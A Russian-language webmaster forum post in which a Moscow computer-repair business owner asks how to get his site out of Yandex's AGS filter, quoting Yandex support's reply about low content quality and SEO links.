помогите АГС! Как выйти ?
Страницы: 1
помогите АГС! Как выйти ?, itcompanion.ru
Всем привет [IMG], я начинающий в теме продвижение сайтов, занимаюсь ремонтом компьютеров в Москве, начал делать сайт itcompanion.ru, продвигать уникальными статьями, их у меня примерно 160, каждая отвечает за определенный район Москвы, к примерно "компьютерная помощь пятницкое шоссе" выдает сразу мою статью на первой страницу в гугле, но в яндексе, сначало выдовало тоже на первой странице, теперь на мой сайт itcompanion.ru наложили санкции АГС. Хотелось бы это исправить, я изменил дизайн, убрал явно не читаемый текст, но это не помогает. Написал письмо в яндекс мне ответили 


Здравствуйте, Михаил!

После анализа Вашего сайта мы пришли к выводу, что он не в полной мере соответствует нашему представлению о качественных сайтах, отраженному в наших рекомендациях:
help.yandex.r...ndexing/quali.. ( help.yandex.ru/webmaster/yandex-indexing/quali.. )
company.yande...ation/index.xml ( company.yandex.ru/rules/optimization/index.xml ) 

Поэтому в настоящий момент значение тИЦ для Вашего сайта аннулировано ( help.yandex.r...-index/tic-ru.. ( help.yandex.ru/catalogue/citation-index/tic-ru.. ) ), и сайт может быть понижен в выдаче до тех пор, пока наши алгоритмы не сочтут его достаточно качественным. Информация об этом есть на странице нашего блога: webmaster.ya....l?item_no=18552 ( webmaster.ya.ru/replies.xml?item_no=18552 ) .

На решение алгоритмов могло повлиять множество факторов, таких как отсутствие оригинального и интересного контента, наличие списков поисковых запросов, использование SEO-ссылок ( webmaster.ya....xml?item_no=325 ( webmaster.ya.ru/replies.xml?item_no=325 ) ), чрезмерное использование рекламы и другие.